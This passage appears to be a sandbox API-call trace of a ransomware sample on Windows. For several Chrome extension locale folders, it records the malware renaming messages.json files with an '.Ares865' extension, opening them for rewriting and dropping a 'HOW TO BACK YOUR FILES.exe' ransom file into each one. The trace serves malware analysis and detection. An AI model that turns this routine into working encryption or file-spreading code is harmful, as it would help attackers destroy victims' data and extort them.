Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.504] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.505] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=206) returned 1 [0103.508] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es" [0103.508] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es" [0103.508] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.508] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.509] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.509] GetLastError () returned 0x0 [0103.509] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.509] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4efddb60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4efddb60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.509] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.509] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.509] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.Ares865") returned 160 [0103.509] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.511] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.511] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=206) returned 1 [0103.514] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US" [0103.514] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US" [0103.514] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.515] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.515] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.515] GetLastError () returned 0x0 [0103.516] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.516] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865396d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f003cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f003cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.516] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.516] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.516] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.Ares865") returned 163 [0103.516] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.517] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.518] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=209) returned 1 [0103.521] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB" [0103.521] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB" [0103.521] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.521] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.522] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.522] GetLastError () returned 0x0 [0103.522] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.522] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f003cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f003cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.522] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.522] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.523] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.Ares865") returned 163 [0103.523] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.525] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=208) returned 1 [0103.528] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el" [0103.528] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el" [0103.528] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.528] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.528] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.529] GetLastError () returned 0x0 [0103.529] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.529] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f003cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f003cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.529] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.529] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.529] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.Ares865") returned 160 [0103.529] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.531] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.531] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=260) returned 1 [0103.534] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de" [0103.534] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de" [0103.535] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0103.535] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\how to back your files.exe"), bFailIfExists=1) returned 0 [0103.535] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0103.535] GetLastError () returned 0x0 [0103.536] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0103.536] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864ed410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f029e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f029e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0103.536] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0103.536] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0103.536] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.Ares865") returned 160 [0103.536] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.ares865"), dwFlags=0x1) returned 1 [0103.537] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0103.538] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=217) returned 1 [0103.542] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS 